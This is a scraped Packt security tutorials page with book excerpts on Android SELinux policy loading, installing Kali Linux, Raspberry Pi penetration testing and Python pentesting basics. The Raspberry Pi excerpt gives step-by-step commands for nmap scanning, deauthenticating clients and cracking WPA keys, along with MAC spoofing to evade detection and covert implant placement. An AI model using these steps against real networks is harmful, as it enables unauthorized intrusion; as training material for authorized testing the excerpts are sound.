Search icon CANCEL
Subscription
0
Cart icon
Your Cart (0 item)
Close icon
You have no products in your basket yet
Save more on your purchases! discount-offer-chevron-icon
Savings automatically calculated. No voucher code required.
Arrow left icon
Explore Products
Best Sellers
New Releases
Books
Videos
Audiobooks
Learning Hub
Newsletter Hub
Free Learning
Arrow right icon

How-To Tutorials - Security

174 Articles
article-image-booting-system
Packt
27 Feb 2015
12 min read
Save for later

Booting the System

Packt
27 Feb 2015
12 min read
In this article by William Confer and William Roberts, author of the book, Exploring SE for Android, we will learn once we have an SE for Android system, we need to see how we can make use of it, and get it into a usable state. In this article, we will: Modify the log level to gain more details while debugging Follow the boot process relative to the policy loader Investigate SELinux APIs and SELinuxFS Correct issues with the maximum policy version number Apply patches to load and verify an NSA policy (For more resources related to this topic, see here.) You might have noticed some disturbing error messages in dmesg. To refresh your memory, here are some of them: # dmesg | grep –i selinux <6>SELinux: Initializing. <7>SELinux: Starting in permissive mode <7>SELinux: Registering netfilter hooks <3>SELinux: policydb version 26 does not match my version range 15-23 ... It would appear that even though SELinux is enabled, we don't quite have an error-free system. At this point, we need to understand what causes this error, and what we can do to rectify it. At the end of this article, we should be able to identify the boot process of an SE for Android device with respect to policy loading, and how that policy is loaded into the kernel. We will then address the policy version error. Policy load An Android device follows a boot sequence similar to that of the *NIX booting sequence. The boot loader boots the kernel, and the kernel finally executes the init process. The init process is responsible for managing the boot process of the device through init scripts and some hard coded logic in the daemon. Like all processes, init has an entry point at the main function. This is where the first userspace process begins. The code can be found by navigating to system/core/init/init.c. When the init process enters main (refer to the following code excerpt), it processes cmdline, mounts some tmpfs filesystems such as /dev, and some pseudo-filesystems such as procfs. For SE for Android devices, init was modified to load the policy into the kernel as early in the boot process as possible. The policy in an SELinux system is not built into the kernel; it resides in a separate file. In Android, the only filesystem mounted in early boot is the root filesystem, a ramdisk built into boot.img. The policy can be found in this root filesystem at /sepolicy on the UDOO or target device. At this point, the init process calls a function to load the policy from the disk and sends it to the kernel, as follows: int main(int argc, char *argv[]) { ...   process_kernel_cmdline();   unionselinux_callback cb;   cb.func_log = klog_write;   selinux_set_callback(SELINUX_CB_LOG, cb);     cb.func_audit = audit_callback;   selinux_set_callback(SELINUX_CB_AUDIT, cb);     INFO(“loading selinux policyn”);   if (selinux_enabled) {     if (selinux_android_load_policy() < 0) {       selinux_enabled = 0;       INFO(“SELinux: Disabled due to failed policy loadn”);     } else {       selinux_init_all_handles();     }   } else {     INFO(“SELinux:  Disabled by command line optionn”);   } … In the preceding code, you will notice the very nice log message, SELinux: Disabled due to failed policy load, and wonder why we didn't see this when we ran dmesg before. This code executes before setlevel in init.rc is executed. The default init log level is set by the definition of KLOG_DEFAULT_LEVEL in system/core/include/cutils/klog.h. If we really wanted to, we could change that, rebuild, and actually see that message. Now that we have identified the initial path of the policy load, let's follow it on its course through the system. The selinux_android_load_policy() function can be found in the Android fork of libselinux, which is in the UDOO Android source tree. The library can be found at external/libselinux, and all of the Android modifications can be found in src/android.c. The function starts by mounting a pseudo-filesystem called SELinuxFS. In systems that do not have sysfs mounted, the mount point is /selinux; on systems that have sysfs mounted, the mount point is /sys/fs/selinux. You can check mountpoints on a running system using the following command: # mount | grep selinuxfs selinuxfs /sys/fs/selinux selinuxfs rw,relatime 0 0 SELinuxFS is an important filesystem as it provides the interface between the kernel and userspace for controlling and manipulating SELinux. As such, it has to be mounted for the policy load to work. The policy load uses the filesystem to send the policy file bytes to the kernel. This happens in the selinux_android_load_policy() function: int selinux_android_load_policy(void) {   char *mnt = SELINUXMNT;   int rc;   rc = mount(SELINUXFS, mnt, SELINUXFS, 0, NULL);   if (rc < 0) {     if (errno == ENODEV) {       /* SELinux not enabled in kernel */       return -1;     }     if (errno == ENOENT) {       /* Fall back to legacy mountpoint. */       mnt = OLDSELINUXMNT;       rc = mkdir(mnt, 0755);       if (rc == -1 && errno != EEXIST) {         selinux_log(SELINUX_ERROR,”SELinux:           Could not mkdir:  %sn”,         strerror(errno));         return -1;       }       rc = mount(SELINUXFS, mnt, SELINUXFS, 0, NULL);     }   }   if (rc < 0) {     selinux_log(SELINUX_ERROR,”SELinux:  Could not mount selinuxfs:  %sn”,     strerror(errno));     return -1;   }   set_selinuxmnt(mnt);     return selinux_android_reload_policy(); } The set_selinuxmnt(car *mnt) function changes a global variable in libselinux so that other routines can find the location of this vital interface. From there it calls another helper function, selinux_android_reload_policy(), which is located in the same libselinux android.c file. It loops through an array of possible policy locations in priority order. This array is defined as follows: Static const char *const sepolicy_file[] = {   “/data/security/current/sepolicy”,   “/sepolicy”,   0 }; Since only the root filesystem is mounted, it chooses /sepolicy at this time. The other path is for dynamic runtime reloads of policy. After acquiring a valid file descriptor to the policy file, the system is memory mapped into its address space, and calls security_load_policy(map, size) to load it to the kernel. This function is defined in load_policy.c. Here, the map parameter is the pointer to the beginning of the policy file, and the size parameter is the size of the file in bytes: int selinux_android_reload_policy(void) {   int fd = -1, rc;   struct stat sb;   void *map = NULL;   int i = 0;     while (fd < 0 && sepolicy_file[i]) {     fd = open(sepolicy_file[i], O_RDONLY | O_NOFOLLOW);     i++;   }   if (fd < 0) {     selinux_log(SELINUX_ERROR, “SELinux:  Could not open sepolicy:  %sn”,     strerror(errno));     return -1;   }   if (fstat(fd, &sb) < 0) {     selinux_log(SELINUX_ERROR, “SELinux:  Could not stat %s:  %sn”,     sepolicy_file[i], strerror(errno));     close(fd);     return -1;   }   map = mmap(NULL, sb.st_size, PROT_READ, MAP_PRIVATE, fd, 0);   if (map == MAP_FAILED) {     selinux_log(SELINUX_ERROR, “SELinux:  Could not map %s:  %sn”,     sepolicy_file[i], strerror(errno));     close(fd);     return -1;   }     rc = security_load_policy(map, sb.st_size);   if (rc < 0) {     selinux_log(SELINUX_ERROR, “SELinux:  Could not load policy:  %sn”,     strerror(errno));     munmap(map, sb.st_size);     close(fd);     return -1;   }     munmap(map, sb.st_size);   close(fd);   selinux_log(SELINUX_INFO, “SELinux: Loaded policy from %sn”, sepolicy_file[i]);     return 0; } The security load policy opens the <selinuxmnt>/load file, which in our case is /sys/fs/selinux/load. At this point, the policy is written to the kernel via this pseudo file: int security_load_policy(void *data, size_t len) {   char path[PATH_MAX];   int fd, ret;     if (!selinux_mnt) {     errno = ENOENT;     return -1;   }     snprintf(path, sizeof path, “%s/load”, selinux_mnt);   fd = open(path, O_RDWR);   if (fd < 0)   return -1;     ret = write(fd, data, len);   close(fd);   if (ret < 0)   return -1;   return 0; } Fixing the policy version At this point, we have a clear idea of how the policy is loaded into the kernel. This is very important. SELinux integration with Android began in Android 4.0, so when porting to various forks and fragments, this breaks, and code is often missing. Understanding all parts of the system, however cursory, will help us to correct issues as they appear in the wild and develop. This information is also useful to understand the system as a whole, so when modifications need to be made, you'll know where to look and how things work. At this point, we're ready to correct the policy versions. The logs and kernel config are clear; only policy versions up to 23 are supported, and we're trying to load policy version 26. This will probably be a common problem with Android considering kernels are often out of date. There is also an issue with the 4.3 sepolicy shipped by Google. Some changes by Google made it a bit more difficult to configure devices as they tailored the policy to meet their release goals. Essentially, the policy allows nearly everything and therefore generates very few denial logs. Some domains in the policy are completely permissive via a per-domain permissive statement, and those domains also have rules to allow everything so denial logs do not get generated. To correct this, we can use a more complete policy from the NSA. Replace external/sepolicy with the download from https://bitbucket.org/seandroid/external-sepolicy/get/seandroid-4.3.tar.bz2. After we extract the NSA's policy, we need to correct the policy version. The policy is located in external/sepolicy and is compiled with a tool called check_policy. The Android.mk file for sepolicy will have to pass this version number to the compiler, so we can adjust this here. On the top of the file, we find the culprit: ... # Must be <= /selinux/policyvers reported by the Android kernel. # Must be within the compatibility range reported by checkpolicy -V. POLICYVERS ?= 26 ... Since the variable is overridable by the ?= assignment. We can override this in BoardConfig.mk. Edit device/fsl/imx6/BoardConfigCommon.mk, adding the following POLICYVERS line to the bottom of the file: ... BOARD_FLASH_BLOCK_SIZE := 4096 TARGET_RECOVERY_UI_LIB := librecovery_ui_imx # SELinux Settings POLICYVERS := 23 -include device/google/gapps/gapps_config.mk Since the policy is on the boot.img image, build the policy and bootimage: $ mmm -B external/sepolicy/ $ make –j4 bootimage 2>&1 | tee logz !!!!!!!!! WARNING !!!!!!!!! VERIFY BLOCK DEVICE !!!!!!!!! $ sudo chmod 666 /dev/sdd1 $ dd if=$OUT/boot.img of=/dev/sdd1 bs=8192 conv=fsync Eject the SD card, place it into the UDOO, and boot. The first of the preceding commands should produce the following log output: out/host/linux-x86/bin/checkpolicy: writing binary representation (version 23) to out/target/product/udoo/obj/ETC/sepolicy_intermediates/sepolicy At this point, by checking the SELinux logs using dmesg, we can see the following: # dmesg | grep –i selinux <6>init: loading selinux policy <7>SELinux: 128 avtab hash slots, 490 rules. <7>SELinux: 128 avtab hash slots, 490 rules. <7>SELinux: 1 users, 2 roles, 274 types, 0 bools, 1 sens, 1024 cats <7>SELinux: 84 classes, 490 rules <7>SELinux: Completing initialization. Another command we need to run is getenforce. The getenforce command gets the SELinux enforcing status. It can be in one of three states: Disabled: No policy is loaded or there is no kernel support Permissive: Policy is loaded and the device logs denials (but is not in enforcing mode) Enforcing: This state is similar to the permissive state except that policy violations result in EACCESS being returned to userspace One of the goals while booting an SELinux system is to get to the enforcing state. Permissive is used for debugging, as follows: # getenforce Permissive Summary In this article, we covered the important policy load flow through the init process. We also changed the policy version to suit our development efforts and kernel version. From there, we were able to load the NSA policy and verify that the system loaded it. This article additionally showcased some of the SELinux APIs and their interactions with SELinuxFS. Resources for Article: Further resources on this subject: Android And Udoo Home Automation? [article] Sound Recorder For Android [article] Android Virtual Device Manager [article]
Read more
  • 0
  • 0
  • 3385

article-image-what-kali-linux
Packt
05 Feb 2015
1 min read
Save for later

What is Kali Linux

Packt
05 Feb 2015
1 min read
This article created by Aaron Johns, the author of Mastering Wireless Penetration Testing for Highly Secured Environments introduces Kali Linux and the steps needed to get started. Kali Linux is a security penetration testing distribution built on Debian Linux. It covers many different varieties of security tools, each of which are organized by category. Let's begin by downloading and installing Kali Linux! (For more resources related to this topic, see here.) Downloading Kali Linux Congratulations, you have now started your first hands-on experience in this article! I'm sure you are excited so let's begin! Visit http://www.kali.org/downloads/. Look under the Official Kali Linux Downloads section: In this demonstration, I will be downloading and installing Kali Linux 1.0.6 32 Bit ISO. Click on the Kali Linux 1.0.6 32 Bit ISO hyperlink to download it. Depending on your Internet connection, this may take an hour to download, so please prepare yourself ahead of time so that you do not have to wait on this download. Those who have a slow Internet connection may want to reconsider downloading from a faster source within the local area. Restrictions on downloading may apply in public locations. Please make sure you have permission to download Kali Linux before doing so. Installing Kali Linux in VMware Player Once you have finished downloading Kali Linux, you will want to make sure you have VMware Player installed. VMware Player is where you will be installing Kali Linux. If you are not familiar with VMware Player, it is simply a type of virtualization software that emulates an operating system without requiring another physical system. You can create multiple operating systems and run them simultaneously. Perform the following steps: Let's start off by opening VMware Player from your desktop: VMware Player should open and display a graphical user interface: Click on Create a New Virtual Machine on the right: Select I will install the operating system later and click on Next. Select Linux and then Debian 7 from the drop-down menu: Click on Next to continue. Type Kali Linux for the virtual machine name. Browse for the Kali Linux ISO file that was downloaded earlier then click on Next. Change the disk size from 25 GB to 50 GB and then click on Next: Click on Finish: Kali Linux should now be displaying in your VMware Player library. From here, you can click on Customize Hardware... to increase the RAM or hard disk space, or change the network adapters according to your system's hardware. Click on Play virtual machine: Click on Player at the top-left and then navigate to Removable Devices | CD/DVD IDE | Settings…: Check the box next to Connected, Select Use ISO image file, browse for the Kali Linux ISO, then click on OK. Click on Restart VM at the bottom of the screen or click on Player, then navigate to Power | Restart Guest; the following screen appears: After restarting the virtual machine, you should see the following: Select Live (686-pae) then press Enter It should boot into Kali Linux and take you to the desktop screen: Congratulations! You have successfully installed Kali Linux. Updating Kali Linux Before we can get started with any of the demonstrations in this book, we must update Kali Linux to help keep the software package up to date. Open VMware Player from your desktop. Select Kali Linux and click on the green arrow to boot it. Once Kali Linux has booted up, open a new Terminal window. Type sudo apt-get update and press Enter: Then type sudo apt-get upgrade and press Enter: You will be prompted to specify if you want to continue. Type y and press Enter: Repeat these commands until there are no more updates: sudo apt-get update sudo apt-get upgrade sudo apt-get dist-upgrade Congratulations! You have successfully updated Kali Linux! Summary This was just the introduction to help prepare you before we get deeper into advanced technical demonstrations and hands-on examples. We did our first hands-on work through Kali Linux to install and update it on VMware Player. Resources for Article: Further resources on this subject: Veil-Evasion [article] Penetration Testing and Setup [article] Wireless and Mobile Hacks [article]
Read more
  • 0
  • 0
  • 2992

article-image-penetration-testing
Packt
04 Feb 2015
15 min read
Save for later

Penetration Testing

Packt
04 Feb 2015
15 min read
In this article by Aamir Lakhani and Joseph Muniz, authors of the book Penetration Testing with Raspberry Pi, we will see the various LAN- and wireless-based attack scenarios, using tools found in Kali Linux that are optimized for a Raspberry Pi. These scenarios include scanning, analyzing and capturing network traffic. (For more resources related to this topic, see here.) The Raspberry Pi has limited performance capabilities due to its size and processing power. It is highly recommended that you test the following techniques in a lab prior to using a Raspberry Pi for a live penetration test. Network scanning Network reconnaissance is typically time-consuming, yet it is the most important step when performing a penetration test. The more you know about your target, the more likely it is that you will find the fastest and easiest path to success. The best practice is starting with reconnaissance methods that do not require you to interact with your target; however, you will need to make contact eventually. Upon making contact, you will need to identify any open ports on a target system as well as map out the environment to which it's connected. Once you breach a system, typically there are other networks that you can scan to gain deeper access to your target's network. One huge advantage of the Raspberry Pi is its size and mobility. Typically, Kali Linux is used from an attack system outside a target's network; however, tools such as PWNIE Express and small systems that run Kali Linux, such as a Raspberry Pi, can be placed inside a network and be remotely accessed. This gives an attacker a system inside the network, bypassing typical perimeter defenses while performing internal reconnaissance. This approach brings the obvious risks of having to physically place the system on the network as well as create a method to communicate with it remotely without being detected; however, if successful, this can be very effective. Let's look at a few popular methods to scan a target network. We'll continue forward assuming that you have established a foothold on a network and now want to understand the current environment that you have connected to. Nmap The most popular open source tool used to scan hosts and services on a network is Nmap (short for Network Mapper). Nmap's advanced features can detect different applications running on systems as well as offer services such as the OS fingerprinting features. Nmap can be very effective; however, it can also be easily detected unless used properly. We recommend using Nmap in very specific situations to avoid triggering a target's defense systems. For more information on how to use Nmap, visit http://nmap.org/. To use Nmap to scan a local network, open a terminal window and type nmap (target), for example, nmap www.somewebsite.com or nmap 192.168.1.2. There are many other commands that can be used to tune your scan. For example, you can tune how stealthy you want to be or specify to store the results in a particular location. The following screenshot shows the results after running Nmap against www.thesecurityblogger.com. Note that this is an example and is considered a noisy scan. If you simply type in either of the preceding two commands, it is most likely that your target will easily recognize that you are performing an Nmap scan. There are plenty of online resources available to learn how to master the various features for Nmap. Here is a reference list of popular nmap commands: nmap 192.168.1.0/24: This scans the entire class C range nmap -p <port ranges>: This scans specific ports nmap -sP 192.168.1.0/24: This scans the network/find servers and devices that are running nmap –iflist: This shows host interfaces and routes nmap –sV 192.168.1.1: This detects remote services' version numbers nmap –sS 192.168.1.1: This performs a stealthy TCP SYN scan nmap –sO 192.168.1.1: This scans for the IP protocol nmap -192.168.1.1 > output.txt: This saves the output from the scan to the text file nmap –sA 192.168.1.254: This checks whether the host is protected by a firewall nmap –PN 192.168.1.1: This scans the host when it is protected by a firewall nmap --reason 192.168.1.1: This displays the reason a port is in a particular state nmap --open 192.168.1.1: This only shows open or possibly open ports The Nmap GUI software Zenmap is not included in the Kali Linux ARM image. It is also not recommended over using the command line when running Kali Linux on a Raspberry Pi. Wireless security Another attack vector that can be leveraged on a Raspberry Pi with a Wi-Fi adapter is targeting wireless devices such as mobile tablets and laptops. Scanning wireless networks, once they are connected, is similar to how scanning is done on a LAN; however, typically a layer of password decryption is required before you can connect to a wireless network. Also, wireless network identifier known as Service Set Identifier (SSID) might not be broadcasted but will still be visible when you use the right tools. This section will cover how to bypass wireless onboarding defenses so that you can access a target's Wi-Fi network and perform the penetration testing steps. Looking at a Raspberry Pi with Kali Linux, one of the use cases is hiding the system inside or near a target's network and launching wireless attacks remotely. The goal will be to enable the Raspberry Pi to access the network wirelessly and provide a remote connection back to the attacker. The attacker can be nearby using wireless to control the Raspberry Pi until it gains wireless access. Once on the network, a backdoor can be established so that the attacker can communicate with the Raspberry Pi from anywhere in the world and launch attacks. Cracking WPA/WPA2 A commonly found security protocol for protecting wireless networks is Wi-Fi Protected Access (WPA). WPA was later replaced by WPA2 and it will be probably what you will be up against when you perform a wireless penetration test. WPA and WPA2 can be cracked with Aircrack. Kali Linux includes the Aircrack suite, which is one of the most popular applications to break wireless security. Aircrack works by gathering packets seen on a wireless connection to either mathematically analyze the data to crack weaker protocols such as Wired Equivalent Privacy (WEP), or use brute force on the captured data with a wordlist. Cracking WPA/WPA2 can be done due to a weakness in the four-way handshake between the client and the access point. In summary, a client will authenticate to an access point and go through a four-step process. This is the time when the attacker is able to grab the password and use a brute force approach to identify it. The time-consuming part in this is based on how unique the network password is, how extensive your wordlist that will be used to brute force against the password is, and the processing power of the system. Unfortunately, the Raspberry Pi lacks the processing power and the hard drive space to accommodate large wordlist files. So, you might have to crack the password off-box with a tool such as John the Ripper. We recommend this route for most WPA2 hacking attempts. Here is the process to crack a WPA running on a Linksys WRVS4400N wireless router using a Raspberry Pi on-box options. We are using a WPA example so that the time-consuming part can be accomplished quickly with a Raspberry Pi. Most WPA2 cracking examples would take a very long time to run from a Raspberry Pi; however, the steps to be followed are the same to run on a faster off-box system. The steps are as follows: Start Aircrack by opening a terminal and typing airmon-ng; In Aircrack, we need to select the desired interface to use for the attack. In the previous screenshot, wlan0 is my Wi-Fi adapter. This is a USB wireless adapter that has been plugged into my Raspberry Pi. It is recommended that you hide your Mac address while cracking a foreign wireless network. Kali Linux ARM does not come with the program macchanger. So, you should download it by using the sudo apt-get install macchanger command in a terminal window. There are other ways to change your Mac address, but macchanger can provide a spoofed Mac so that your device looks like a common network device such as a printer. This can be an effective way to avoid detection. Next, we need to stop the interface used for the attack so that we can change our Mac address. So, for this example, we will be stopping wlan0 using the following commands: airmon-ng stop wlan0 ifconfig wlan0 down Now, let's change the Mac address of this interface to hide our true identity. Use macchanger to change your Mac to a random value and specify your interface. There are options to switch to another type of device; however, for this example, we will just leave it as a random Mac address using the following command: macchanger -r wlan0 Our random value is b0:43:3a:1f:3a:05 in the following screenshot. Macchanger shows our new Mac as unknown. Now that our Mac is spoofed, let's restart airmon-ng with the following command: airmon-ng start wlan0 We need to locate available wireless networks so that we can pick our target to attack. Use the following command to do this: airodump-ng wlan0 You should now see networks within range of your Raspberry Pi that can be targeted for this attack. To stop the search once you identify a target, press Ctrl + C. You should write down the Mac address, also known as BSSID, and the channel, also known as CH, used by your target network. The following screenshot shows that our target with ESSID HackMePlease is running WPA on CH 6: The next step is running airodump against the Mac address that you just copied. You will need the following things to make this work: The channel being used by the target The Mac address (BSSID) that you copied A name for the file to save your data Let's run the airodump command in the following manner: airodump-ng –c [channel number] –w [name of file] –-bssid [target ssid] wlan0 This will open a new terminal window after you execute it. Keep that window open. Open another terminal window that will be used to connect to the target's wireless network. We will run aireplay using the following command: aireplay-ng-deauth 1 –a [target's BSSID] –c [our BSSID] [interface] For our example, the command will look like the following: aireplay-ng -–deauth 1 –a 00:1C:10:F6:04:C3 –c 00:0f:56:bc:2c:d1 wlan0 The following screenshot shows the launch of the preceding command: You may not get the full handshake when you run this command. If that happens, you will have to wait for a live user to authenticate you to the access point prior to launching the attack. The output on using Aircrack may show you something like Opening [file].cap a few times followed by No valid WPA handshakes found, if you didn't create a full handshake and somebody hasn't authenticated you by that time. Do not proceed to the next step until you capture a full handshake. The last step is to run Aircrack against the captured data to crack the WPA key. Use the –w option to specify the location of a wordlist that will be used to scan against the captured data. You will use the .cap file that was created earlier during step 9, so we will use the name capturefile.cap in our example. We'll do this using the following command: Aircrack-ng –w ./wordlist.lst wirelessattack.cap The Kali Linux ARM image does not include a wordlist.lst file for cracking passwords. Usually, default wordlists are not good anyway. So, it is recommended that you use Google to find an extensive wordlist (see the next section on wordlists for more information). Make sure to be mindful of the hard drive space that you have on the Raspberry Pi, as many wordlists might be too large to be used directly from the Raspberry Pi. The best practice for running process-intensive steps such as brute forcing passwords is to do them off-box on a more powerful system. You will see Aircrack start and begin trying each password in the wordlist file against the captured data. This process could take a while depending on the password you are trying to break, the number of words in your list, and the processing speed of the Raspberry Pi. We found that it ranges from a few hours to days, as it's a very tedious process and is possibly better-suited for an external system with more horsepower than a Raspberry Pi. You may also find that your wordlist doesn't work after waiting a few days to sort through the entire wordlist file. If Aircrack doesn't open and start trying keys against the password, you either didn't specify the location of the .cap file or the location of the wordlist.lst file, or you don't have the captured handshake data. By default, the previous steps store files in the root directory. You can move your wordlist file in the root directory to mimic how we ran the commands in the previous steps since all our files are located in the root directory folder. You can verify this by typing ls to list the current directory files. Make sure that you list the correct directories of each file that are called by each command. If your attack is successful, you should see something like the following screenshot that shows the identified password as sunshine: It is a good idea to perform this last step on a remote machine. You can set up a FTP server and push your .cap files to that FTP server. You can learn more about setting up an FTP server at http://www.raspberrypi.org/forums/viewtopic.php?f=36&t=35661. Creating wordlists There are many sources and tools that can be used to develop a wordlist for your attack. One popular tool called Custom Wordlist Generator (CeWL), allows you to create your own custom dictionary file. This can be extremely useful if you are targeting individuals and want to scrape their blogs, LinkedIn, or other websites for commonly used words. CeWL doesn't come preinstalled on the Kali Linux ARM image, so you will have to download it using apt-get install cewl. To use CeWL, open a terminal window and put in your target website. CeWL will examine the URL and create a wordlist based on all the unique words it finds. In the following example, we are creating a wordlist of commonly used words found on the security blog www.drchaos.com using the following command: cewl www.drchaos.com -w drchaospasswords.txt The following screenshot shows the launch of the preceding command: You can also find many examples of popular wordlists used as dictionary files on the Internet. Here are a few wordlist examples sources that you can use; however, be sure to research Google for other options as well: https://crackstation.net/buy-crackstation-wordlist-password-cracking-dictionary.html https://wiki.skullsecurity.org/Passwords Here is a dictionary that one of the coauthors put together: http://www.drchaos.com/public_files/chaos-dictionary.lst.txt Capturing traffic on the network It is great to get access to a target network. However, typically the next step, once a foothold is established, is to start looking at the data. To do this, you will need a method to capture and view network packets. This means turning your Raspberry Pi into a remotely accessible network tap. Many of these tools could overload and crash your Raspberry Pi. Look out for our recommendations regarding when to use a tuning method to avoid this from happening. Tcpdump Tcpdump is a command line based packet analyzer. You can use tcpdump to intercept and display TCP/IP and other packets that are transmitted and seen attached by the system This means the Raspberry Pi must have access to the network traffic that you intend to view or using tcpdump won't provide you with any useful data. Tcpdump is not installed with the default Kali Linux ARM image, so you will have to install it using the sudo apt-get install tcpdump command. Once installed, you can run tcpdump by simply opening a terminal window and typing sudo tcpdump. The following screenshot shows the traffic flow visible to us after the launch of the preceding command: As the previous screenshot shows, there really isn't much to see if you don't have the proper traffic flowing through the Raspberry Pi. Basically, we're seeing our own traffic while being plugged into an 802.1X-enabled switch, which isn't interesting. Let's look at how to get other system's data through your Raspberry Pi. Running tcpdump consumes a lot of the Raspberry Pi's processing power. We found that this could crash the Raspberry Pi by itself or while using it with other applications. We recommend that you tune your data capture to avoid this from happening. Man-in-the-middle attacks One common method to capture sensitive information is by performing a man-in-the-middle attack. By definition, a man-in-the-middle attack is when an attacker makes independent connections with victims while actively eavesdropping on the communication. This is typically done between a host and the systems. For example, a popular method to capture passwords is to act as a middleman between login credentials passed by a user to a web server. Summary This article introduced us to the various attack scenarios of penetration testing used with the tools available in Kali Linux, over a Raspberry Pi. This article also gave us detailed description of tools like Nmap, CeWL, and tcpdump, which are used for network scanning, creating wordlists, and analyzing network traffic respectively. Resources for Article: Further resources on this subject: Testing Your Speed [Article] Creating a 3D world to roam in [Article] Making the Unit Very Mobile – Controlling the Movement of a Robot with Legs [Article]
Read more
  • 0
  • 0
  • 4614
Banner background image

article-image-pentesting-using-python
Packt
04 Feb 2015
22 min read
Save for later

Pentesting Using Python

Packt
04 Feb 2015
22 min read
 In this article by the author, Mohit, of the book, Python Penetration Testing Essentials, Penetration (pen) tester and hacker are similar terms. The difference is that penetration testers work for an organization to prevent hacking attempts, while hackers hack for any purpose such as fame, selling vulnerability for money, or to exploit vulnerability for personal enmity. Lots of well-trained hackers have got jobs in the information security field by hacking into a system and then informing the victim of the security bug(s) so that they might be fixed. A hacker is called a penetration tester when they work for an organization or company to secure its system. A pentester performs hacking attempts to break the network after getting legal approval from the client and then presents a report of their findings. To become an expert in pentesting, a person should have deep knowledge of the concepts of their technology.  (For more resources related to this topic, see here.) Introducing the scope of pentesting In simple words, penetration testing is to test the information security measures of a company. Information security measures entail a company's network, database, website, public-facing servers, security policies, and everything else specified by the client. At the end of the day, a pentester must present a detailed report of their findings such as weakness, vulnerability in the company's infrastructure, and the risk level of particular vulnerability, and provide solutions if possible. The need for pentesting There are several points that describe the significance of pentesting: Pentesting identifies the threats that might expose the confidentiality of an organization Expert pentesting provides assurance to the organization with a complete and detailed assessment of organizational security Pentesting assesses the network's efficiency by producing huge amount of traffic and scrutinizes the security of devices such as firewalls, routers, and switches Changing or upgrading the existing infrastructure of software, hardware, or network design might lead to vulnerabilities that can be detected by pentesting In today's world, potential threats are increasing significantly; pentesting is a proactive exercise to minimize the chance of being exploited Pentesting ensures whether suitable security policies are being followed or not Consider an example of a well-reputed e-commerce company that makes money from online business. A hacker or group of black hat hackers find a vulnerability in the company's website and hack it. The amount of loss the company will have to bear will be tremendous. Components to be tested An organization should conduct a risk assessment operation before pentesting; this will help identify the main threats such as misconfiguration or vulnerability in: Routers, switches, or gateways Public-facing systems; websites, DMZ, e-mail servers, and remote systems DNS, firewalls, proxy servers, FTP, and web servers Testing should be performed on all hardware and software components of a network security system. Qualities of a good pentester The following points describe the qualities of good pentester. They should: Choose a suitable set of tests and tools that balance cost and benefits Follow suitable procedures with proper planning and documentation Establish the scope for each penetration test, such as objectives, limitations, and the justification of procedures Be ready to show how to exploit the vulnerabilities State the potential risks and findings clearly in the final report and provide methods to mitigate the risk if possible Keep themselves updated at all times because technology is advancing rapidly A pentester tests the network using manual techniques or the relevant tools. There are lots of tools available in the market. Some of them are open source and some of them are highly expensive. With the help of programming, a programmer can make his own tools. By creating your own tools, you can clear your concepts and also perform more R&D. If you are interested in pentesting and want to make your own tools, then the Python programming language is the best, as extensive and freely available pentesting packages are available in Python, in addition to its ease of programming. This simplicity, along with the third-party libraries such as scapy and mechanize, reduces code size. In Python, to make a program, you don't need to define big classes such as Java. It's more productive to write code in Python than in C, and high-level libraries are easily available for virtually any imaginable task. If you know some programming in Python and are interested in pentesting this book is ideal for you. Defining the scope of pentesting Before we get into pentesting, the scope of pentesting should be defined. The following points should be taken into account while defining the scope: You should develop the scope of the project in consultation with the client. For example, if Bob (the client) wants to test the entire network infrastructure of the organization, then pentester Alice would define the scope of pentesting by taking this network into account. Alice will consult Bob on whether any sensitive or restricted areas should be included or not. You should take into account time, people, and money. You should profile the test boundaries on the basis of an agreement signed by the pentester and the client. Changes in business practice might affect the scope. For example, the addition of a subnet, new system component installations, the addition or modification of a web server, and so on, might change the scope of pentesting. The scope of pentesting is defined in two types of tests: A non-destructive test: This test is limited to finding and carrying out the tests without any potential risks. It performs the following actions: Scans and identifies the remote system for potential vulnerabilities Investigates and verifies the findings Maps the vulnerabilities with proper exploits Exploits the remote system with proper care to avoid disruption Provides a proof of concept Does not attempt a Denial-of-Service (DoS) attack A destructive test: This test can produce risks. It performs the following actions: Attempts DoS and buffer overflow attacks, which have the potential to bring down the system Approaches to pentesting There are three types of approaches to pentesting: Black-box pentesting follows non-deterministic approach of testing You will be given just a company name It is like hacking with the knowledge of an outside attacker There is no need of any prior knowledge of the system It is time consuming White-box pentesting follows deterministic approach of testing You will be given complete knowledge of the infrastructure that needs to be tested This is like working as a malicious employee who has ample knowledge of the company's infrastructure You will be provided information on the company's infrastructure, network type, company's policies, do's and don'ts, the IP address, and the IPS/IDS firewall Gray-box pentesting follows hybrid approach of black and white box testing The tester usually has limited information on the target network/system that is provided by the client to lower costs and decrease trial and error on the part of the pentester It performs the security assessment and testing internally Introducing Python scripting Before you start reading this book, you should know the basics of Python programming, such as the basic syntax, variable type, data type tuple, list dictionary, functions, strings, methods, and so on. Two versions, 3.4 and 2.7.8, are available at python.org/downloads/. In this book, all experiments and demonstration have been done in Python 2.7.8 Version. If you use Linux OS such as Kali or BackTrack, then there will be no issue, because many programs, such as wireless sniffing, do not work on the Windows platform. Kali Linux also uses the 2.7 Version. If you love to work on Red Hat or CentOS, then this version is suitable for you. Most of the hackers choose this profession because they don't want to do programming. They want to use tools. However, without programming, a hacker cannot enhance his2 skills. Every time, they have to search the tools over the Internet. Believe me, after seeing its simplicity, you will love this language. Understanding the tests and tools you'll need To conduct scanning and sniffing pentesting, you will need a small network of attached devices. If you don't have a lab, you can make virtual machines in your computer. For wireless traffic analysis, you should have a wireless network. To conduct a web attack, you will need an Apache server running on the Linux platform. It will be a good idea to use CentOS or Red Hat Version 5 or 6 for the web server because this contains the RPM of Apache and PHP. For the Python script, we will use the Wireshark tool, which is open source and can be run on Windows as well as Linux platforms. Learning the common testing platforms with Python You will now perform pentesting; I hope you are well acquainted with networking fundamentals such as IP addresses, classful subnetting, classless subnetting, the meaning of ports, network addresses, and broadcast addresses. A pentester must be perfect in networking fundamentals as well as at least in one operating system; if you are thinking of using Linux, then you are on the right track. In this book, we will execute our programs on Windows as well as Linux. In this book, Windows, CentOS, and Kali Linux will be used. A hacker always loves to work on a Linux system. As it is free and open source, Kali Linux marks the rebirth of BackTrack and is like an arsenal of hacking tools. Kali Linux NetHunter is the first open source Android penetration testing platform for Nexus devices. However, some tools work on both Linux and Windows, but on Windows, you have to install those tools. I expect you to have knowledge of Linux. Now, it's time to work with networking on Python. Implementing a network sniffer by using Python Before learning about the implementation of a network sniffer, let's learn about a particular struct method: struct.pack(fmt, v1, v2, ...): This method returns a string that contains the values v1, v2, and so on, packed according to the given format 